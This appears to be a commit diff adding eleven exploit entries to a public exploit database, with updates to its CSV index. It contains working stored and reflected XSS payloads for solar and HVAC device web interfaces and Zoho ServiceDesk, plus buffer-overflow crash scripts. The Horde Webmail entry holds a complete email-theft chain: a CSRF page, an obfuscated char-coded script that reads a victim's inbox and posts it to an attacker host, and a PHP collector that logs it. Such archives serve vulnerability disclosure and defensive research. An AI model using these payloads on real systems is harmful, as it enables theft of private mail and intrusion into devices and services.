DB: 2019-05-23

11 changes to exploits/shellcodes

BlueStacks 4.80.0.1060 - Denial of Service (PoC)
RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC)
RarmaRadio 2.72.3 - 'Username' Denial of Service (PoC)
TapinRadio 2.11.6 - 'Address' Denial of Service (PoC)
TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC)
Zoho ManageEngine ServiceDesk Plus < 10.5 - Improper Access Restrictions
Zoho ManageEngine ServiceDesk Plus 9.3 - Cross-Site Scripting
AUO Solar Data Recorder < 1.3.0 - 'addr' Cross-Site Scripting
Carel pCOWeb < B1.2.1 - Cross-Site Scripting
Carel pCOWeb < B1.2.1 - Credentials Disclosure
Horde Webmail 5.2.22 - Multiple Vulnerabilities

exploits/hardware/webapps/46896.txt

@@ -0,0 +1,17 @@
+# Exploit Title: AUO Solar Data Recorder - Stored XSS
+# Date: 2019-04-16
+# Exploit Author: Luca.Chiou
+# Vendor Homepage: https://www.auo.com/zh-TW
+# Version: AUO Solar Data Recorder all versions prior to v1.3.0
+# Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index
+
+# 1. Description:
+# In AUO Solar Data Recorder web page,
+# user can modify the system settings by access the /protect/config.htm.
+# Attackers can inject malicious XSS code in parameter "addr" of post data.
+# The value of addr will be stored in database, so that cause a stored XSS vulnerability.
+
+# 2. Proof of Concept:
+# Browse http://<Your<http://%3cYour> Modem IP>/protect/config.htm
+# Send this post data:
+ addr= "<script>alert(123)</script>&dhcp=1

exploits/hardware/webapps/46897.txt

@@ -0,0 +1,19 @@
+# Exploit Title: Carel pCOWeb - Stored XSS
+# Date: 2019-04-16
+# Exploit Author: Luca.Chiou
+# Vendor Homepage: https://www.carel.com/
+# Version: Carel pCOWeb all versions prior to B1.2.1
+# Tested on: It is a proprietary devices: http://www.carel.com/product/pcoweb-card
+
+# 1. Description:
+# In Carel pCOWeb web page,
+# user can modify the system configuration by access the /config/pw_snmp.html.
+# Attackers can inject malicious XSS code in post data.
+# The XSS code will be stored in database, so that cause a stored XSS vulnerability.
+
+# 2. Proof of Concept:
+# Browse http://<Your<http://%3cYour> Modem IP>/config/pw_snmp.html
+# Send this post data:
+%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
+# The post data in URL decode format is:
+?script:setdb('snmp','syscontact')="><script>alert(123)</script>

exploits/hardware/webapps/46898.txt

@@ -0,0 +1,16 @@
+# Exploit Title: Carel pCOWeb - Unprotected Storage of Credentials
+# Date: 2019-04-16
+# Exploit Author: Luca.Chiou
+# Vendor Homepage: https://www.carel.com/
+# Version: Carel pCOWeb all versions prior to B1.2.1
+# Tested on: It is a proprietary devices: http://www.carel.com/product/pcoweb-card
+
+# 1. Description:
+# The devices, Carel pCOWeb, store plaintext passwords,
+# which may allow sensitive information to be read by someone with access to the device.
+
+# 2. Proof of Concept:
+# Browse the maintain user page in website:
+# http://<Your<http://%3cYour> Modem IP>/config/pw_changeusers.html
+# The user's information include Description, Username and Password.
+# In user page, we can find out that user passwords stored in plaintext.

exploits/multiple/webapps/46894.txt

@@ -0,0 +1,12 @@
+# Exploit Title: Zoho ManageEngine ServiceDesk Plus < 10.5 Incorrect Access Control
+# Date: 2019-05-21
+# Exploit Author: Enter of VinCSS (Vingroup)
+# Vendor Homepage: https://www.manageengine.com/products/service-desk
+# Version: Zoho ManageEngine ServiceDesk Plus < 10.5
+# CVE : CVE-2019-12252
+
+
+
+In Zoho ManageEngine ServiceDesk Plus through 10.5, users with the lowest privileges (guest) can view an arbitrary post by appending its number to the 
+
+SDNotify.do?notifyModule=Solution&mode=E-Mail&notifyTo=SOLFORWARD&id= substring

exploits/multiple/webapps/46895.txt

@@ -0,0 +1,13 @@
+# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting
+# Date: 2019-05-21
+# Exploit Author: Enter of VinCSS (Vingroup)
+# Vendor Homepage: https://www.manageengine.com/products/service-desk
+# Version: Zoho ManageEngine ServiceDesk Plus 9.3
+# CVE : CVE-2019-12189
+
+
+An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SearchN.do search field.
+
+The vulnerability stems from the confusion of both single quotes and semicolon in the query string of the URL.
+
+payload: ';alert('XSS');' Attack vector: http:///site.com/SearchN.do

exploits/php/webapps/46903.txt

@@ -0,0 +1,70 @@
+# Title: Horde Webmail - XSS + CSRF to SQLi, RCE, Stealing Emails <= v5.2.22
+# Date: 17.05.2019
+# Author: InfinitumIT
+# Vendor Homepage: https://www.horde.org/
+# Version: Up to v5.2.22.
+# CVE: CVE-2019-12094 & CVE-2019-12095
+# info@infinitumit.com.tr && numan.ozdemir@infinitumit.com.tr
+# PoC: https://numanozdemir.com/respdisc/horde/horde.mp4
+# Materials: https://numanozdemir.com/respdisc/horde/materials.zip
+
+# Description:
+# Attacker can combine "CSRF vulnerability in Trean Bookmarks (defaultly installed on Horde Groupware)" and
+# "Stored XSS vulnerability in Horde TagCloud (defaultly installed)" vulnerabilities to steal victim's emails.
+
+# Also:
+# Attacker can use 3 different reflected XSS vulnerability to exploit Remote Command Execution, SQL Injection and Code Execution.
+# To steal e-mails, attacker will send an e-mail to victim and victim will click the attacker's website.
+# So, victim's inbox will be dumped in attacker's FTP.
+# All of them vulnerabillities are valid for all Horde Webmail versions.
+
+# Attacker will exploit the CSRF and XSS with: index.html
+# Attacker will steal and post the emails with: stealer.js
+# Attacker will save the emails with: stealer.php
+
+# index.html Codes:
+<script>
+var url = "http://webmail.victimserver.com/trean/";
+var params =  
+'iframe=0&popup=0&newFolder=&actionID=add_bookmark&url=http%3A%2F%2Ftest.com&title=vulnerability&description=vulnerability&treanBookmarkTags=%22%3E%3Cscript%2Fsrc%3D%22http%3A%2F%2Fyourwebsite.com%2Fhorde%2Fstealer.js%22%3E%3C%2Fscript%3E';
+var vuln = new XMLHttpRequest();
+vuln.open("POST", url, true);
+vuln.withCredentials = 'true';
+vuln.setRequestHeader("Content-type",
+"application/x-www-form-urlencoded");
+vuln.send(params);
+</script>
+<embed/src="http://webmail.victimserver.com/services/portal/"/height="1"/width="1">
+
+
+# stealer.js Codes:
+eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,58,47,47,99,111,100,101,46,106,113,117,101,114,121,46,99,111,109,47,106,113,117,101,114,121,45,51,46,51,46,49,46,109,105,110,46,106,115,39,62,60,47,115,99,114,105,112,116,62,60,115,99,114,105,112,116,62,102,117,110,99,116,105,111,110,32,115,116,101,97,108,40,115,116,97,114,116,44,32,101,110,100,41,123,118,97,114,32,115,116,97,114,116,59,118,97,114,32,101,110,100,59,118,97,114,32,105,59,102,111,114,40,105,61,115,116,97,114,116,59,32,105,60,61,101,110,100,59,32,105,43,43,41,123,36,46,103,101,116,40,39,104,116,116,112,58,47,47,119,101,98,109,97,105,108,46,118,105,99,116,105,109,115,101,114,118,101,114,46,99,111,109,47,105,109,112,47,118,105,101,119,46,112,104,112,63,97,99,116,105,111,110,73,68,61,118,105,101,119,95,115,111,117,114,99,101,38,105,100,61,48,38,109,117,105,100,61,123,53,125,73,78,66,79,88,39,43,105,44,32,102,117,110,99,116,105,111,110,40,100,97,116,97,41,123,118,97,114,32,120,109,108,72,116,116,112,32,61,32,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,120,109,108,72,116,116,112,46,111,112,101,110,40,39,80,79,83,84,39,44,32,39,104,116,116,112,58,47,47,121,111,117,114,119,101,98,115,105,116,101,46,99,111,109,47,104,111,114,100,101,47,115,116,101,97,108,101,114,46,112,104,112,39,44,32,116,114,117,101,41,59,120,109,108,72,116,116,112,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,39,67,111,110,116,101,110,116,45,84,121,112,101,39,44,32,39,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,39,41,59,120,109,108,72,116,116,112,46,115,101,110,100,40,39,105,110,98,111,120,61,39,43,100,97,116,97,41,59,125,41,59,125,114,101,116,117,114,110,32,105,59,125,115,116,101,97,108,40,56,44,49,53,41,59,60,47,115,99,114,105,112,116,62,34,41,59,10,47,47,32,115,116,101,97,108,40,120,44,121,41,32,61,32,115,116,101,97,108,32,102,114,111,109,32,105,100,32,120,32,116,111,32,105,100,32,121))
+// It is charcoded, firstly decode and edit for yourself then encode again. Also dont forget to remove spaces!
+
+
+# stealer.php Codes:
+<?php
+header('Access-Control-Allow-Origin: *');
+header('Access-Control-Allow-Headers: *');
+if($_POST['inbox']){
+$logs = fopen("inbox.txt", "a+");
+$data = $_POST['inbox']."  
+-----------------------------------------------------------------  
+".chr(13).chr(10).chr(13).chr(10);
+fwrite($logs, $data);
+}
+?>
+
+#  
+_____________________________________________________________________________________________________
+
+# Reflected XSS to Remote Command Execution, Remote Code Execution and SQL Injection:
+
+# http://webmail.victimserver.com/groupware/admin/user.php?user_name=XSS-PAYLOAD-HERE&form=update_f
+# http://webmailvictimserver.com/groupware/admin/user.php?user_name=XSS-PAYLOAD-HERE&form=remove_f
+# http://webmail.victimserver.com/groupware/admin/config/diff.php?app=XSS-PAYLOAD-HERE
+
+# Attacker can execute commands & PHP codes remotely and inject harmful SQL queries.
+# Also, attacker can create users too with those reflected XSS vulnerabilities.
+
+# Stay Secure with InfinitumIT - infinitumit.com.tr

exploits/windows/dos/46893.py

@@ -0,0 +1,21 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: BlueStacks 4.80.0.1060 - Denial of Service (PoC)
+# Date: 21/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: https://www.bluestacks.com
+# Software: https://www.bluestacks.com/download.html?utm_campaign=bluestacks-4-en
+# Version: 4.80.0.1060
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script 'Bluestacks.py', it will create a new file 'exploit.txt'
+# 2.- Copy the text from the generated exploit.txt file to clipboard
+# 3.- Open BlueStacks
+# 4.- Paste clipboard in the search field and click on the search button
+# 5.- Crashed
+
+buffer = "\x41" * 100000
+
+f = open ("exploit.txt", "w")
+f.write(buffer)
+f.close()

exploits/windows/dos/46899.txt

@@ -0,0 +1,22 @@
+#Exploit Title: RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-21
+#Vendor Homepage: http://www.raimersoft.com/
+#Software Link: www.raimersoft.com/downloads/rarmaradio_setup.exe
+#Tested Version: 2.72.3
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: rarmaradio_server.py
+#2.- Open rarma_ser.txt and copy content to clipboard
+#3.- Open RarmaRadio
+#4.- Select "Edit" > "Settings" > "Network"
+#5.- In "Server" field paste Clipboard
+#6.- Select "OK"
+#7.- Crashed
+
+cod = "\x41" * 4000
+
+f = open('rarma_ser.txt', 'w')
+f.write(cod)
+f.close()

exploits/windows/dos/46900.txt

@@ -0,0 +1,22 @@
+#Exploit Title: RarmaRadio 2.72.3 - 'Username' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-21
+#Vendor Homepage: http://www.raimersoft.com/
+#Software Link: www.raimersoft.com/downloads/rarmaradio_setup.exe
+#Tested Version: 2.72.3
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: rarmaradio_username.py
+#2.- Open rarma_user.txt and copy content to clipboard
+#3.- Open RarmaRadio
+#4.- Select "Edit" > "Settings" > "Network"
+#5.- In "Username" field paste Clipboard
+#6.- Select "OK"
+#7.- Crashed
+
+cod = "\x41" * 5000
+
+f = open('rarma_user.txt', 'w')
+f.write(cod)
+f.close()

exploits/windows/dos/46901.py

@@ -0,0 +1,23 @@
+#Exploit Title: TapinRadio 2.11.6 - 'Address' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-21
+#Vendor Homepage: http://www.raimersoft.com/
+#Software Link: www.raimersoft.com/downloads/tapinradio_setup_x64.exe
+#Tested Version: 2.11.6
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: tapinadio_address.py
+#2.- Open tapin_add.txt and copy content to clipboard
+#3.- Open TapinRadio
+#4.- Select "Settings" > "Preferences" > "Miscellaneous"
+#5.- Select "Set Application Proxy..."" In "Address" field paste Clipboard
+#6.- In Port type "444" > "Username" type "test" > Password type "1234"
+#7.- Select "OK" and "OK"
+#8.- Crashed
+
+cod = "\x41" * 3000
+	
+f = open('tapin_add.txt', 'w')
+f.write(cod)
+f.close()

exploits/windows/dos/46902.py

@@ -0,0 +1,23 @@
+#Exploit Title: TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-21
+#Vendor Homepage: http://www.raimersoft.com/
+#Software Link: www.raimersoft.com/downloads/tapinradio_setup_x64.exe
+#Tested Version: 2.11.6
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: tapinadio_user.py
+#2.- Open tapin_user.txt and copy content to clipboard
+#3.- Open TapinRadio
+#4.- Select "Settings" > "Preferences" > "Miscellaneous"
+#5.- Select "Set Application Proxy..."" In "Username" field paste Clipboard
+#6.- In Server type "1.1.1.1" > Port type 444  > Password type "1234"
+#7.- Select "OK" and "OK"
+#8.- Crashed
+
+cod = "\x41" * 10000
+	
+f = open('tapin_user.txt', 'w')
+f.write(cod)
+f.close()

files_exploits.csv

@@ -6452,6 +6452,11 @@ id,file,description,date,author,type,platform,port
 46890,exploits/multiple/dos/46890.txt,"macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - AIR Optimization Incorrectly Removes Assignment to Register",2019-05-21,"Google Security Research",dos,multiple,
 46891,exploits/multiple/dos/46891.cc,"macOS < 10.14.5 / iOS < 12.3 XNU - Wild-read due to bad cast in stf_ioctl",2019-05-21,"Google Security Research",dos,multiple,
 46892,exploits/multiple/dos/46892.txt,"macOS < 10.14.5 / iOS < 12.3 XNU - 'in6_pcbdetach' Stale Pointer Use-After-Free",2019-05-21,"Google Security Research",dos,multiple,
+46893,exploits/windows/dos/46893.py,"BlueStacks 4.80.0.1060 - Denial of Service (PoC)",2019-05-22,"Alejandra Sánchez",dos,windows,
+46899,exploits/windows/dos/46899.txt,"RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC)",2019-05-22,"Victor Mondragón",dos,windows,
+46900,exploits/windows/dos/46900.txt,"RarmaRadio 2.72.3 - 'Username' Denial of Service (PoC)",2019-05-22,"Victor Mondragón",dos,windows,
+46901,exploits/windows/dos/46901.py,"TapinRadio 2.11.6 - 'Address' Denial of Service (PoC)",2019-05-22,"Victor Mondragón",dos,windows,
+46902,exploits/windows/dos/46902.py,"TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC)",2019-05-22,"Victor Mondragón",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -41316,3 +41321,9 @@ id,file,description,date,author,type,platform,port
 46885,exploits/java/webapps/46885.txt,"Oracle CTI Web Service - 'EBS_ASSET_HISTORY_OPERATIONS' XML Entity Injection",2019-05-21,omurugur,webapps,java,
 46886,exploits/php/webapps/46886.py,"WordPress Plugin WPGraphQL 0.2.3 - Multiple Vulnerabilities",2019-05-21,"Simone Quatrini",webapps,php,80
 46887,exploits/java/webapps/46887.txt,"Brocade Network Advisor 14.4.1 - Unauthenticated Remote Code Execution",2019-05-21,"Jakub Palaczynski",webapps,java,
+46894,exploits/multiple/webapps/46894.txt,"Zoho ManageEngine ServiceDesk Plus < 10.5 - Improper Access Restrictions",2019-05-22,Vingroup,webapps,multiple,
+46895,exploits/multiple/webapps/46895.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - Cross-Site Scripting",2019-05-22,Vingroup,webapps,multiple,
+46896,exploits/hardware/webapps/46896.txt,"AUO Solar Data Recorder < 1.3.0 - 'addr' Cross-Site Scripting",2019-05-22,Luca.Chiou,webapps,hardware,
+46897,exploits/hardware/webapps/46897.txt,"Carel pCOWeb < B1.2.1 - Cross-Site Scripting",2019-05-22,Luca.Chiou,webapps,hardware,
+46898,exploits/hardware/webapps/46898.txt,"Carel pCOWeb < B1.2.1 - Credentials Disclosure",2019-05-22,Luca.Chiou,webapps,hardware,
+46903,exploits/php/webapps/46903.txt,"Horde Webmail 5.2.22 - Multiple Vulnerabilities",2019-05-22,InfinitumIT,webapps,php,